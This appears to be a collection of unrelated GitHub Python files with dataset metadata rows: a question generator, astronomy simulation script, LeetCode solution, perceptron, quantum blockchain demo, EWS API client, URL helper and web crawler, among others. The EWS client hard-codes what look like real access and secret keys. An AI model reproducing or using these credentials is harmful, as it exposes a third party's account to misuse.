# anywhere in this file -- TODO confirm against the functions package.
object_dictionary = {
    "fruit": {
        "items": [
            "apple",
            "orange",
            # "banana",
            # "strawberry",
            # "grape",
        ],
        "range": [1]
    },
    "vegetable": {
        "items": [
            "carrot",
            "broccoli",
            # "tomato",
            # "potato",
            # "cabbage"
        ],
        "range": [1]
    },
    "animal":{
        "items": [
            "dog",
            "cat",
            # "elephant",
            # "giraffe",
            # "dolphin"
        ],
        "range": [1]
    },
    "geometry": {
        "items": [
            "triangle",
            "square",
            "pentagon",
            "hexagon",
            "octagon"
        ],
        "range": [1]
    },
    "clock": {
        "items": [
            "clock 1",
            "clock 2",
            "clock 3",
            "clock 4",
            "clock 5",
            "clock 6",
            "clock 7",
            "clock 8",
            "clock 9",
            "clock 10",
            "clock 11",
            "clock 12"
        ],
        "range": [1]
    }
}
def determine_object_type(sampled_items):
    """Classify a sampled item set by how many object categories it spans.

    Returns "single_object" for exactly one item, "intra_category" when all
    items share one category, and "inter_category" otherwise.
    """
    def first_category(item):
        # Mirror the original's behaviour: only the first matching
        # category counts for each item.
        for category, details in object_dictionary.items():
            if item in details["items"]:
                return category
        return None

    categories = {c for c in map(first_category, sampled_items) if c is not None}
    if len(sampled_items) == 1:
        return "single_object"
    return "intra_category" if len(categories) == 1 else "inter_category"
def test_create_QA():
    """Build QA pairs for one hand-picked item set (clock/shape/fruit mix).

    Most generators are commented out; currently only the clock-time
    questions are produced. Returns a one-element list of
    {"obj_json": ..., "qa_pairs": ...} records.
    """
    obj_to_return = []
    question_item = {'clock 1': 1, 'square':2, 'orange': 4}
    object_key = determine_object_type([item for item in question_item.keys()])
    qa_pairs = []
    # qa_pairs += counting(question_item, object_key)
    # qa_pairs += multiple_operations_two_ops(question_item, object_key)
    # qa_pairs += single_arithematic(question_item, object_key)
    # qa_pairs += average_point_value(question_item, object_key)
    # qa_pairs += permutations(question_item, object_key)
    # qa_pairs += combinations(question_item, object_key)
    # qa_pairs += probability_questions(question_item, object_key)
    # qa_pairs += comparison_questions(question_item, object_key)
    # qa_pairs += logical_questions(question_item, object_key)
    # qa_pairs += number_theory_questions(question_item, object_key)
    # qa_pairs += generate_graph_theory_questions(question_item, object_key)
    # qa_pairs += pattern_recognition_questions(question_item, object_key)
    # qa_pairs += knapsack_questions(question_item, object_key)
    # qa_pairs += greedy_questions(question_item, object_key)
    # qa_pairs += sort_and_median_questions(question_item, object_key)
    # qa_pairs += recursion_questions(question_item, object_key)
    # qa_pairs += temporal_questions(question_item, object_key)
    # qa_pairs += incomplete_questions(question_item, object_key)
    # qa_pairs += spatial_reasoning_questions(question_item, object_key)
    # qa_pairs += generate_shape_questions(question_item, object_key)
    qa_pairs += generate_clock_time_questions(question_item, object_key)
    obj_to_return.append({
        "obj_json": question_item,
        "qa_pairs": qa_pairs,
    })
    return obj_to_return
def create_QA():
    """Enumerate item combinations across all categories and emit QA pairs.

    For every combination of up to 9 items, and every assignment of counts
    in items_range to those items, generates counting questions. Returns a
    list of {"obj_json": ..., "qa_pairs": ...} records.
    """
    obj_to_return = []
    total_questions = 0
    # Flatten the items across all categories
    all_items = []
    for category, details in object_dictionary.items():
        all_items.extend(details["items"])
    items_range = [1, 5] # A generic range for simplicity
    for L in range(1, len(all_items) + 1):
        # Cap the combination size at 9 to bound the run time.
        if L<=9:
            for sampled_items in itertools.combinations(all_items, L):
                object_type = determine_object_type(sampled_items)
                number_of_objects = len(sampled_items)
                item_count_values = [i for i in range(items_range[0], items_range[1] + 1)]
                # Cartesian product of possible counts, one axis per item.
                lists = [item_count_values] * number_of_objects
                for combination in itertools.product(*lists):
                    index = 0
                    qa_pairs = []
                    question_item = {}
                    for item in sampled_items:
                        item_count = combination[index]
                        question_item[item] = item_count
                        index += 1
                    # Now, we generate questions for these combinations
                    qa_pairs += counting(question_item, object_type)
                    # qa_pairs += multiple_operations_two_ops_extended(number_of_objects, sampled_items, question_item)
                    obj_to_return.append({
                        "obj_json": question_item,
                        "qa_pairs": qa_pairs,
                    })
                    total_questions += len(qa_pairs)
    print(f"Total questions: {total_questions}")
    return obj_to_return
if __name__ == "__main__":
    # Raw string: '\M' and '\d' are invalid escape sequences in a normal
    # literal (DeprecationWarning today, an error in future Python versions);
    # the resulting path bytes are unchanged.
    file_path = r'D:\MLMM_ASU\MLLM_Evaluation_Scale\display3.json'
    with open(file_path, 'w') as f:
        json.dump(test_create_QA(), f)
3419259967 | from spectractor import parameters
from spectractor.simulation.simulator import AtmosphereGrid, SpectrumSimulatorSimGrid
from spectractor.config import load_config
from spectractor.simulation.image_simulation import ImageSim
from spectractor.logbook import LogBook
from spectractor.extractor.extractor import Spectractor
# CLI entry point: parse arguments, then for each input FITS image look up
# its target/position in the logbook, simulate the image, and extract the
# spectrum from the simulated frame.
if __name__ == "__main__":
    from argparse import ArgumentParser
    parser = ArgumentParser()
    parser.add_argument(dest="input", metavar='path', default=["tests/data/reduc_20170530_134.fits"],
                        help="Input fits file name. It can be a list separated by spaces, or it can use * as wildcard.",
                        nargs='*')
    parser.add_argument("-d", "--debug", dest="debug", action="store_true",
                        help="Enter debug mode (more verbose and plots).", default=False)
    parser.add_argument("-v", "--verbose", dest="verbose", action="store_true",
                        help="Enter verbose (print more stuff).", default=False)
    parser.add_argument("-o", "--output_directory", dest="output_directory", default="outputs/",
                        help="Write results in given output directory (default: ./outputs/).")
    parser.add_argument("-l", "--logbook", dest="logbook", default="./tests/data/ctiofulllogbook_jun2017_v5.csv",
                        help="CSV logbook file. (default: ./tests/data/ctiofulllogbook_jun2017_v5.csv).")
    parser.add_argument("-c", "--config", dest="config", default="config/ctio.ini",
                        help="INI config file. (default: config.ctio.ini).")
    args = parser.parse_args()
    parameters.VERBOSE = args.verbose
    if args.debug:
        parameters.DEBUG = True
        parameters.VERBOSE = True
    file_names = args.input
    load_config(args.config)
    logbook = LogBook(logbook=args.logbook)
    for file_name in file_names:
        tag = file_name.split('/')[-1]
        disperser_label, target, xpos, ypos = logbook.search_for_image(tag)
        # Skip images the logbook cannot resolve.
        if target is None or xpos is None or ypos is None:
            continue
        spectrum_file_name = args.output_directory + '/' + tag.replace('.fits', '_spectrum.fits')
        # NOTE(review): `atmgrid` and `image` are never used afterwards --
        # presumably kept for their construction side effects; confirm.
        atmgrid = AtmosphereGrid(file_name)
        image = ImageSim(file_name, spectrum_file_name, args.output_directory, A1=1, A2=1,
                         pwv=5, ozone=300, aerosols=0.03,
                         psf_poly_params=None, with_stars=True)
        sim_file_name = args.output_directory + tag.replace('reduc_', 'sim_')
        Spectractor(sim_file_name, args.output_directory, target, [xpos, ypos], disperser_label, args.config)
| LSSTDESC/Spectractor | runSimulator.py | runSimulator.py | py | 2,608 | python | en | code | 13 | github-code | 36 |
14380560581 | from typing import *
class Solution:
    def floodFill(self, image: List[List[int]], sr: int, sc: int, color: int) -> List[List[int]]:
        """Flood-fill `image` in place from (sr, sc) with `color`.

        All 4-connected pixels sharing the start pixel's value are recolored.
        Uses an explicit stack instead of the original recursion, which
        could raise RecursionError on large connected regions. Returns the
        (mutated) image.
        """
        source = image[sr][sc]
        if source == color:
            # Nothing to do; also prevents an infinite fill loop.
            return image
        rows, cols = len(image), len(image[0])
        stack = [(sr, sc)]
        while stack:
            r, c = stack.pop()
            if image[r][c] != source:
                continue
            image[r][c] = color
            if r > 0:
                stack.append((r - 1, c))
            if r < rows - 1:
                stack.append((r + 1, c))
            if c > 0:
                stack.append((r, c - 1))
            if c < cols - 1:
                stack.append((r, c + 1))
        return image
| jithindmathew/LeetCode | flood-fill.py | flood-fill.py | py | 735 | python | en | code | 0 | github-code | 36 |
18056687843 | from one_layer_net_base import OneLayerNetBase
class OneLayerNet(OneLayerNetBase):
    """Single-layer net trained with the delta rule and a step activation."""

    def calc_corrections(self, vector, learning_rate):
        """Apply one delta-rule weight update per neuron for *vector*."""
        targets = vector.get_desired_outputs()
        for idx, neuron in enumerate(self.neurons):
            error = targets[idx] - neuron.get_out()
            scaled_error = learning_rate * error
            # First delta adjusts the bias weight; the rest scale the inputs.
            deltas = [scaled_error]
            for i in range(len(neuron.get_weights()) - 1):
                deltas.append(scaled_error * vector.get_x()[i])
            neuron.correct_weights(deltas)

    def activation_func(self, net):
        """Heaviside step: 1.0 when net >= 0, else 0.0."""
        return float(net >= 0)

    def calc_loss(self, vector):
        """Sum of absolute errors between desired and actual outputs."""
        return sum(
            abs(vector.get_desired_outputs()[j] - neuron.get_out())
            for j, neuron in enumerate(self.neurons)
        )
| StanislavMakhrov/OneLayerPerceptron | pure_python/one_layer_net_delta_rule.py | one_layer_net_delta_rule.py | py | 873 | python | en | code | 0 | github-code | 36 |
72734862185 | from qblockchain import QBlockchain
import hashlib
def main():
    """Demo of the quantum blockchain helpers: mine a block, XOR two hex
    strings, hash the result, and split a binary digest into 4-bit chunks."""
    qbc = QBlockchain()
    qbc.mine_block("First block 1")
    print(qbc.is_chain_valid())
    #qbc.break_up_4bit_values([0000])
    #qbc.xor(["23ab0","12ab0"],4)
    xor_bin = qbc.xor(str("1234"), str("abc0"), 4)
    hashOut = hashlib.sha3_256(xor_bin.encode("ascii")).hexdigest()
    print(hashOut)
    text = "0000000"
    hashIn = hashlib.sha3_256(text.encode("ascii")).hexdigest() # hashing the 'text' input
    #string-type output
    print ('hashIn-hex:', hashIn, 'length:', len(hashIn))
    # convert hashIn(hex) to hashIn_bin(binary)
    scale = 16 #hex base
    hashIn_bin = bin(int(hashIn, scale))[2:].zfill(len(hashIn)*4)
    print ('hashIn-binary:', str(hashIn_bin), 'length:', len(hashIn_bin))
    #input hashIn string
    fourbit_array = qbc.break_up_4bit_values(hashIn_bin)
    print(len(fourbit_array))
    # NOTE(review): q_par is computed but unused (circuit call commented out).
    q_par = [int(fourbit_array[i],2) for i in range(len(fourbit_array)-1)] #throwing away the last string element
    #circuit = qbc.quantum_circuit(q_par, 1)
def mine():
    """Mine a block on a simulator-backed chain, then run the simulated miner."""
    chain = QBlockchain("qasm_simulator")
    chain.mine_block("any str")
    chain.mine_using_simu(2)
def starts_with(new_hash, starts):
    """Print and return whether *new_hash* begins with the prefix *starts*."""
    matched = new_hash.startswith(starts)
    print(matched)
    return matched
if __name__ == "__main__":
#main()
mine()
starts_with("Hello wello","Hello")
starts_with("b502d86bf9ed32cfcc64414bb0d129718ba0961144083c2f26358edbd312040d","00") | asiaat/python_qblockchain | main.py | main.py | py | 1,487 | python | en | code | 0 | github-code | 36 |
16620383859 | # @Author: Billy Li <billyli>
# @Date: 06-05-2022
# @Email: li000400@umn.edu
# @Last modified by: billyli
# @Last modified time: 06-06-2022
import sys
from pathlib import Path
import shutil
import numpy as np
from scipy.stats import uniform
data_dir = Path.cwd().parent.joinpath("data")
sys.path.insert(1, str(data_dir))
from hit_generator import stochastic
from util import plot_in_RAM, small_helix_check, hits2arc
from information import *
def discretize(x, min, max, res):
    """Map x in [min, max) onto a bin index in [0, res-1].

    Both ends are now clamped: the original only clamped the top, so an x
    below `min` produced a negative index that silently wrapped around when
    used to index the numpy array in xy2map. (Parameter names `min`/`max`
    shadow the builtins; kept for backward compatibility with callers.)
    """
    step = (max - min) / res
    result = (x - min) // step
    if result >= res:
        result = res - 1
    if result < 0:
        result = 0
    return int(result)
def xy2map(xs, ys, res):
    """Rasterise (x, y) positions into a res x res binary occupancy map.

    Coordinates span [-810, 810] on both axes; row 0 corresponds to the
    largest y (image convention). Any bin containing a point is set to 1.0.
    """
    occupancy = np.zeros(shape=(res, res), dtype=float)
    x_lo, x_hi = -810, 810
    y_lo, y_hi = -810, 810
    for x, y in zip(xs, ys):
        col = discretize(x, x_lo, x_hi, res)
        row = discretize(y, y_lo, y_hi, res)
        occupancy[res - 1 - row, col] = 1.0
    return occupancy
# feature_dir_default =
def make_data_single_track(feature_dir):
    """Generate a single-track dataset: N_data rasterised hit images (X) and
    their fitted-arc-center heat maps (Y), saved as X.npy/Y.npy under
    feature_dir."""
    feature_dir.mkdir(parents=True, exist_ok=True)
    ### set dataset property
    # Number of samples
    N_data = 100
    N_generated = 0
    # quality cut
    dx_min = 100
    dy_min = 100
    res = 256
    # set track source (db files)
    track_dir = Path.cwd().parent.parent.joinpath('data').joinpath('raw')
    db_list = ["train_CeEndpoint-mix-fromCSV_1.db",
                "train_CeEndpoint-mix-fromCSV_2.db",\
                "train_CeEndpoint-mix-fromCSV_3.db"]
    file_list = [track_dir.joinpath(db) for db in db_list]
    # set track distribution
    dist = uniform(loc=1, scale=0)
    # set track generator
    gen = stochastic(dist=dist, db_files=file_list, hitNumCut=20)
    X = []
    Y = []
    # Keep drawing tracks until N_data pass the small-helix quality cut.
    while N_generated < N_data:
        hit_dict = gen.generate(mode='production')
        if small_helix_check(hit_dict,dx_min=dx_min,dy_min=dy_min):
            continue
        else:
            sys.stdout.write(t_info(f'Finding qualified track: {N_generated+1}/{N_data}', special='\r'))
            if N_generated+1 == N_data:
                sys.stdout.write('\n')
            sys.stdout.flush()
            x = plot_in_RAM(hit_dict, res)
            x = x.reshape(res,res)
            X.append(x)
            # Fit an arc to the hits; (a, b) is rasterised at 1/8 resolution.
            a, b, R = hits2arc(hit_dict)
            y = xy2map([a], [b], int(res/8))
            N_generated += 1
            Y.append(y)
    X = np.array(X)
    Y = np.array(Y)
    X_file = feature_dir.joinpath("X.npy")
    Y_file = feature_dir.joinpath("Y.npy")
    np.save(X_file, X)
    np.save(Y_file, Y)
    return
# Script entry point: write the dataset under <repo>/data/interm/single_track.
if __name__ == "__main__":
    data_dir = Path.cwd().parent.parent.joinpath("data")
    feature_dir = data_dir.joinpath("interm").joinpath("single_track")
    make_data_single_track(feature_dir)
| billy000400/CircNN | src/features/make_data_single_track.py | make_data_single_track.py | py | 2,828 | python | en | code | 0 | github-code | 36 |
13990400448 | from collections import defaultdict
from sys import maxint
class Solution(object):
    """Greedy settlement of debts with as few transfers as possible.

    Ported to run on both Python 2 and 3: the original used ``sys.maxint``
    and ``dict.iteritems``, neither of which exists on Python 3.
    """

    def getClosest(self, S, t):
        """Return the (key, amount) pair from S whose amount is closest to t.

        Ties keep the earliest pair; returns None when S is empty.
        """
        closest = None
        minDiff = float('inf')  # py3-safe replacement for sys.maxint
        for k, x in S:
            diff = abs(t - x)
            if diff < minDiff:
                minDiff = diff
                closest = k, x
        return closest

    def minTransfers(self, transactions):
        """
        :type transactions: List[List[int]]
        :rtype: int

        Each transaction [x, y, z] credits x with z and debits y by z.
        Greedily matches the largest debtor with the creditor whose balance
        is closest, repeating until every balance is settled.
        """
        snd = lambda t: t[1]
        balance = defaultdict(int)
        for x, y, z in transactions:
            balance[x] += z
            balance[y] -= z
        pos, neg = [], []
        for k, b in balance.items():  # .iteritems() was Python-2-only
            if b > 0:
                pos.append((k, b))
            elif b < 0:
                neg.append((k, -b))
        opers = 0
        while neg:
            kn, negBal = max(neg, key=snd)
            neg.remove((kn, negBal))
            kp, posBal = self.getClosest(pos, negBal)
            pos.remove((kp, posBal))
            rem = negBal - posBal
            if rem > 0:
                neg.append((kn, rem))
            elif rem < 0:
                pos.append((kp, -rem))
            opers += 1
        return opers
# trans = [[0,1,10],[2,0,5]]
# trans = [[0,1,10], [1,0,1], [1,2,5], [2,0,5]]
# Demo: eight-person transaction set from the problem statement.
trans = [[1, 8, 1], [1, 13, 21], [2, 8, 10], [3, 9, 20], [4, 10, 61],
         [5, 11, 61], [6, 12, 59], [7, 13, 60]]
print(Solution().minTransfers(trans))
| dariomx/topcoder-srm | leetcode/zero-pass/google/optimal-account-balancing/Solution3.py | Solution3.py | py | 1,460 | python | en | code | 0 | github-code | 36 |
25163396057 |
import os
from unittest import mock
from easul import util
from easul.driver import MemoryDriver
from easul.visual import Visual
from easul.tests.example import diabetes_progression_algorithm, prog_input_data, no_prog_input_data
import logging
from easul.visual.element import Prediction
from easul.visual.element.prediction import ProbabilityPlot, LimeTablePlot
logging.basicConfig(level = logging.INFO)
LOG = logging.getLogger(__name__)
from easul.tests.example import EXAMPLE_PATH
import anys
import pytest
# Canned model outputs (as produced by the diabetes-progression algorithm)
# used to drive the simple, non-explainable elements below.
prog_result = {"value":1,"label":"Progression", "probabilities":[{"value":0,"label":"No progression","probability":0.26},{"value":1,"label":"Progression","probability":0.74}]}
no_prog_result = {"value":0,"label":"No progression", "probabilities":[{"value":0,"label":"No progression","probability":0.67},{"value":1,"label":"Progression","probability":0.33}]}
# (element class, matcher for the rendered HTML, canned model result) triples.
row_simple_elements = [
    (ProbabilityPlot, anys.AnyContains("data:image/png;base64"), prog_result),
    (Prediction, anys.AnyContains("<h5>Progression</h5>"), prog_result),
    (Prediction, anys.AnyContains("<h5>No progression</h5>"), no_prog_result)
]
# Explainable elements are fed raw input data instead of a precomputed result.
row_explain_elements = [
    (LimeTablePlot, anys.AnyContains("ldl, low-density lipoproteins</b> is less than 95.85"), prog_input_data),
    (LimeTablePlot, anys.AnyContains("ldl, low-density lipoproteins</b> is less than 95.85"), no_prog_input_data),
]
@pytest.mark.parametrize("element_cls,expected_html,result", row_simple_elements)
def test_create_simple_elements_for_ml(element_cls, expected_html, result):
    """Render one simple element from a canned model result and check the HTML."""
    mem_driver = MemoryDriver.from_reference("A1", autocreate=True)
    vis = Visual(
        elements=[element_cls()],
        metadata_filename=EXAMPLE_PATH + "/metadata/row_scope.emd",
        algorithm=diabetes_progression_algorithm(),
    )
    rendered = vis.render(driver=mem_driver, result=result)
    assert str(rendered) == expected_html
@pytest.mark.parametrize("element_cls,expected_html,input_data", row_explain_elements)
def test_create_explainable_elements_for_ml(element_cls, expected_html, input_data):
    """Render an explainable element from raw input data and check the HTML."""
    mem_driver = MemoryDriver.from_reference("A1", autocreate=True)
    vis = Visual(
        elements=[element_cls()],
        metadata_filename=EXAMPLE_PATH + "/metadata/row_scope.emd",
        algorithm=diabetes_progression_algorithm(),
    )
    ctx = vis.generate_context(input_data=input_data)
    rendered = vis.render(driver=mem_driver, context=ctx)
    assert str(rendered) == expected_html
def test_show_prediction_handles_expressions():
    """A Prediction element with an expression scales the value and appends the suffix."""
    mem_driver = MemoryDriver.from_reference("A1", autocreate=True)
    algorithm = diabetes_progression_algorithm()
    vis = Visual(
        elements=[
            Prediction(title="Predicted amount", expression="value * 100",
                       suffix="%", as_value=True)
        ],
        metadata_filename=EXAMPLE_PATH + "/metadata/row_scope.emd",
        algorithm=algorithm,
    )
    result = algorithm.single_result(prog_input_data)
    rendered = vis.render(driver=mem_driver, result=result)
    assert str(rendered) == anys.AnyContains("100.00%")
| rcfgroup/easul | easul/tests/visual/test_prediction.py | test_prediction.py | py | 2,967 | python | en | code | 1 | github-code | 36 |
32487421332 | #-*-coding:utf-8 -*-
import sys
import hmac
import hashlib
import time
import requests
import json
import urllib
import top
class ewsServiceApi:
    '''
    Aliyun EWS open-API client.

    Requests are authenticated with an upper-case HMAC-MD5 signature over
    the request parameters, sent in the ``Authorization`` header.
    '''
    def __init__(self, accesskey, secretkey):
        self.accesskey = accesskey
        # NOTE: attribute keeps the original (misspelled) name for
        # compatibility with existing callers.
        self.secrekey = secretkey
        self.timestamp = int(1000 * time.time())  # epoch milliseconds

    def sign(self, secret, parameters):
        """Return the upper-case HMAC-MD5 signature for ``parameters``.

        If ``parameters`` is a dict, the string to sign is
        ``secret + k1v1k2v2... + secret`` with keys in sorted order;
        otherwise ``parameters`` is signed as-is.
        """
        if hasattr(parameters, "items"):
            # BUG FIX: the original called sorted(keys) and discarded the
            # result, so the signature was built over keys in arbitrary
            # dict order instead of sorted order.
            keys = sorted(parameters)
            parameters = "%s%s%s" % (
                secret,
                str().join('%s%s' % (key, parameters[key]) for key in keys),
                secret)
        # The HMAC key is always the instance secret (matches the original
        # behaviour; callers pass self.secrekey as `secret` too).
        SecretKey = self.secrekey
        sign = hmac.new(
            SecretKey.encode('utf-8'),
            parameters.encode('utf-8'),
            hashlib.md5
        ).hexdigest().upper()
        return sign

    def get(self, geturl):
        """GET an EWS endpoint with signed auth headers; return parsed JSON."""
        parames = {
            'accesskey': self.accesskey,
            'timestamp': self.timestamp,
        }
        sign = self.sign(self.secrekey, parames)
        headers = {'Authorization': sign}
        req = requests.get(geturl, params=parames, headers=headers)
        context = json.loads(req.text)
        return context

    def post(self, deployurl, node_id, comment):
        """Trigger a sequential deployment upload for ``node_id``.

        Prints the parsed JSON response from the uploadStart endpoint.
        """
        parameters = {
            'accesskey': self.accesskey,
            'comment': comment,
            'method': 'SEQUENTIAL',
            'node_id': node_id,
            'timestamp': self.timestamp,
            'update': "false",
            'url': deployurl,
        }
        sign = self.sign(self.secrekey, parameters)
        headers = {'Authorization': sign}
        serivceUrl = 'http://open-ews.cloud.tmall.com/api/v1/node/{0}/uploadStart/'.format(node_id)
        res = requests.post(url=serivceUrl, params=parameters, headers=headers)
        aa = json.loads(res.text)
        print(aa)
# Manual smoke test against the live EWS endpoint (network side effects!).
# WARNING(review): credentials are hard-coded; move them to config/env.
if __name__ == '__main__':
    client = ewsServiceApi(
        accesskey='kqlnim0khfpou45p',
        secretkey='7226d410ef16427e821e61ebe30e8939'
    )
    client.get(geturl='http://open-ews.cloud.tmall.com/api/v1/service/')
    client.post(deployurl='http://10.26.235.132/job/meetyou-youzijie-center-new/ws/youzijie-center.war', node_id=622290, comment='临时处理推荐商品专场过滤111')
| opnms/opnms | base/ewsService.py | ewsService.py | py | 2,267 | python | en | code | 0 | github-code | 36 |
class URL_helper:
    """Static lookup tables for building sreality-style search URLs.

    Holds house-type slugs, region -> district slugs, and slug -> English
    display names.  NOTE(review): the region key 'Vysocine' looks like a
    typo for 'Vysocina', but is kept as-is since callers may rely on it.
    """
    def __init__(self):
        self.__HOUSE_TYPES_LIST = ['rodinne-domy', 'vily', 'chalupy', 'chaty', 'projekty-na-klic', 'zemedelske-usedlosti',
                              'pamatky-jine', 'vicegeneracni-domy']
        self.__HOUSE_LOCATIONS_DICT = {'Karlovarsky': ['cheb', 'karlovy-vary','sokolov'],
                         'Plzensky': ['tachov', 'rokycany', 'plzen-sever', 'plzen', 'plzen-jih', 'klatovy', 'domazlice'],
                         'Ustecky': ['usti-nad-labem', 'teplice', 'most', 'louny', 'litomerice', 'decin', 'chomutov'],
                         'Stredocesky': ['benesov', 'beroun', 'kladno', 'kolin', 'kutna-hora', 'melnik', 'mlada-boleslav', 'nymburk', 'praha-vychod', 'praha-zapad', 'pribram', 'rakovnik'],
                         'Praha': ['praha-1', 'praha-2', 'praha-3', 'praha-4', 'praha-5', 'praha-6', 'praha-7', 'praha-8', 'praha-9', 'praha-10'],
                         'Jihocesky': ['ceske-budejovice', 'cesky-krumlov', 'jindrichuv-hradec', 'pisek', 'prachatice', 'strakonice', 'tabor'],
                         'Vysocine': ['havlickuv-brod', 'jihlava', 'pelhrimov', 'trebic', 'zdar-nad-sazavou'],
                         'Pardubicky': ['chrudim', 'pardubice', 'svitavy', 'usti-nad-orlici'],
                         'Kralovehradecky': ['hradec-kralove', 'jicin', 'nachod', 'rychnov-nad-kneznou', 'trutnov'],
                         'Liberecky': ['ceska-lipa', 'jablonec-nad-nisou', 'liberec', 'semily'],
                         'Jihomoravsky': ['blansko', 'breclav', 'brno', 'brno-venkov', 'hodonin', 'vyskov', 'znojmo'],
                         'Olomoucky': ['olomouc', 'prerov', 'jesenik', 'prostejov', 'sumperk'],
                         'Zlinsky': ['kromeriz', 'uherske-hradiste', 'vsetin', 'zlin'],
                         'Moravskoslezsky': ['bruntal', 'frydek-mistek', 'karvina', 'novy-jicin', 'opava', 'ostrava']}
        self.__ENGLISH_NAME_TO_CZECH = {'Praha': 'Prague', 'benesov': 'Benešov', 'beroun': 'Beroun', 'kladno': 'Kladno', 'kolin': 'Kolín',
                                        'kutna-hora': 'Kutná Hora', 'melnik': 'Mělník', 'mlada-boleslav': 'Mladá Boleslav', 'nymburk': 'Nymburk',
                                        'praha-vychod': 'Prague-East', 'praha-zapad': 'Prague-West', 'pribram': 'Příbram', 'rakovnik': 'Rakovník',
                                        'ceske-budejovice': 'České Budějovice','cesky-krumlov': 'Český Krumlov','jindrichuv-hradec': 'Jindřichův Hradec',
                                        'pisek': 'Písek', 'prachatice': 'Prachatice', 'strakonice': 'Strakonice', 'tabor': 'Tábor', 'domazlice': 'Domažlice',
                                        'klatovy': 'Klatovy', 'plzen': 'Plzeň-City', 'plzen-jih': 'Plzeň-South', 'plzen-sever': 'Plzeň-North',
                                        'rokycany': 'Rokycany', 'tachov': 'Tachov', 'cheb': 'Cheb', 'karlovy-vary': 'Karlovy Vary', 'sokolov': 'Sokolov',
                                        'chomutov': 'Chomutov', 'decin': 'Děčín', 'litomerice': 'Litoměřice', 'louny': 'Louny', 'most': 'Most', 'teplice': 'Teplice',
                                        'usti-nad-labem': 'Ústí nad Labem', 'ceska-lipa': 'Česká Lípa', 'jablonec-nad-nisou': 'Jablonec nad Nisou',
                                        'liberec': 'Liberec', 'semily': 'Semily', 'hradec-kralove': 'Hradec Králové', 'jicin': 'Jičín', 'nachod': 'Náchod',
                                        'rychnov-nad-kneznou': 'Rychnov nad Kněžnou', 'trutnov': 'Trutnov', 'chrudim': 'Chrudim', 'pardubice': 'Pardubice',
                                        'svitavy': 'Svitavy', 'usti-nad-orlici': 'Ústí nad Orlicí', 'havlickuv-brod': 'Havlíčkův Brod', 'jihlava': 'Jihlava',
                                        'pelhrimov': 'Pelhřimov', 'trebic': 'Třebíč', 'zdar-nad-sazavou': 'Žďár nad Sázavou', 'blansko': 'Blansko',
                                        'breclav': 'Břeclav', 'brno': 'Brno-City', 'brno-venkov': 'Brno-Country', 'hodonin': 'Hodonín', 'vyskov': 'Vyškov',
                                        'znojmo': 'Znojmo', 'jesenik': 'Jeseník', 'olomouc': 'Olomouc', 'prerov': 'Přerov', 'prostejov': 'Prostějov',
                                        'sumperk': 'Šumperk', 'kromeriz': 'Kroměříž', 'uherske-hradiste': 'Uherské Hradiště', 'vsetin': 'Vsetín',
                                        'zlin': 'Zlín', 'bruntal': 'Bruntál', 'frydek-mistek': 'Frýdek-Místek', 'karvina': 'Karviná', 'novy-jicin': 'Nový Jičín',
                                        'opava': 'Opava', 'ostrava': 'Ostrava-City'}

    def getEnglishNameToCzechDict(self):
        """Return the mapping from URL slug to display name."""
        return self.__ENGLISH_NAME_TO_CZECH

    def getHouseTypesList(self):
        """Return the list of house-type URL slugs."""
        return self.__HOUSE_TYPES_LIST

    def getHouseLocationsDict(self):
        """Return the mapping from region name to its district URL slugs."""
        return self.__HOUSE_LOCATIONS_DICT

    def getLocationsSet(self):
        """Return the set of all district slugs.

        The Prague region is represented by the single slug 'praha'
        rather than its numbered city districts.
        """
        locations = set()
        for region, districts in self.__HOUSE_LOCATIONS_DICT.items():
            if region == 'Praha':
                locations.add('praha')
            else:
                # In-place union instead of rebinding via set.union (avoids
                # building a fresh set per region as the original did).
                locations.update(districts)
        return locations

    def getLen(self):
        """Return the number of distinct searchable locations."""
        return len(self.getLocationsSet())
| eugenganenco/SRealty | webScraper/URL_helper.py | URL_helper.py | py | 5,434 | python | cs | code | 0 | github-code | 36 |
34353676149 | import requests
from bs4 import BeautifulSoup
from time import sleep
import json
from sqlalchemy import create_engine,Column,Integer,String,ForeignKey,table, column, select, update, insert
from sqlalchemy.ext.declarative import declarative_base
from urlparse import urlparse
from sqlalchemy.orm import sessionmaker
from sqlalchemy import *
# Crawl the start.bg portal front page and record, for each distinct
# outbound .bg site, the value of its HTTP `Server` response header in a
# local SQLite database; finally print a count per server implementation.
start = "http://register.start.bg/"
f = requests.get(start)
soup = BeautifulSoup(f.text, 'html.parser')
# Final report: server-name -> number of stored sites using it (filled
# from the DB after crawling).
websites = {}
# Netlocs already inserted, so each site is stored only once.
# BUG FIX: the original tested `parsed.netloc not in websites` but never
# added netlocs to `websites`, so deduplication never happened (and its
# `websites[netloc] += 1` fallback would have raised KeyError).
seen_netlocs = set()
Base = declarative_base()
engine = create_engine('sqlite:///servers.db', echo = True)
Session = sessionmaker(bind=engine)
session = Session()
metadata = MetaData()
connection = engine.connect()
servers = Table('servers', metadata,
    Column('user_id', Integer, primary_key=True),
    Column('server', String, nullable=False),
    Column('website', String)
)
count = 0
metadata.create_all(engine)
# Stop after 10 successful inserts.
for link in soup.find_all('a'):
    l = link.get('href')
    ext = ".bg"
    ht = "http"
    print(count)
    if l is None:
        continue
    elif u"link.php" in l:
        # Portal-internal redirect: resolve it relative to the portal.
        try:
            lin = start + str(l)
            obj1 = requests.get(lin)
            parsed = urlparse(lin)
            # Membership on requests headers is case-insensitive, unlike
            # the original manual loop comparing keys to "Server" exactly.
            if "Server" in obj1.headers and parsed.netloc not in seen_netlocs:
                seen_netlocs.add(parsed.netloc)
                engine.execute(servers.insert(), server=obj1.headers["Server"], website=obj1.url)
                count += 1
        except requests.exceptions.ConnectionError:
            pass
    elif ext in l and ht in l:
        # BUG FIX: the original condition `ext and ht in l` parsed as
        # `(".bg") and ("http" in l)`, i.e. the ".bg" check never ran.
        try:
            obj = requests.get(l)
            parsed = urlparse(obj.url)
            # Guard the header lookup; the original would KeyError on
            # responses without a `Server` header.
            if "Server" in obj.headers and parsed.netloc not in seen_netlocs:
                seen_netlocs.add(parsed.netloc)
                engine.execute(servers.insert(), server=obj.headers["Server"], website=obj.url)
                count += 1
        except requests.exceptions.ConnectionError:
            pass
    else:
        continue
    if count >= 10:
        break
# Tally how many stored sites use each distinct server implementation.
s = select([distinct(servers.c.server)])
result = connection.execute(s)
for row in result:
    websites[row[0]] = 0
s = select([servers.c.server])
result = connection.execute(s)
for row in result:
    websites[row[0]] += 1
print(websites)
| VladislavSpassov/HackBulgariaTasks | Week13/CrawnBGWebsites.py | CrawnBGWebsites.py | py | 3,072 | python | en | code | 0 | github-code | 36 |
34642170576 | #!/usr/bin/python3
from network import Model
from Experiences import Experiences
import numpy as np
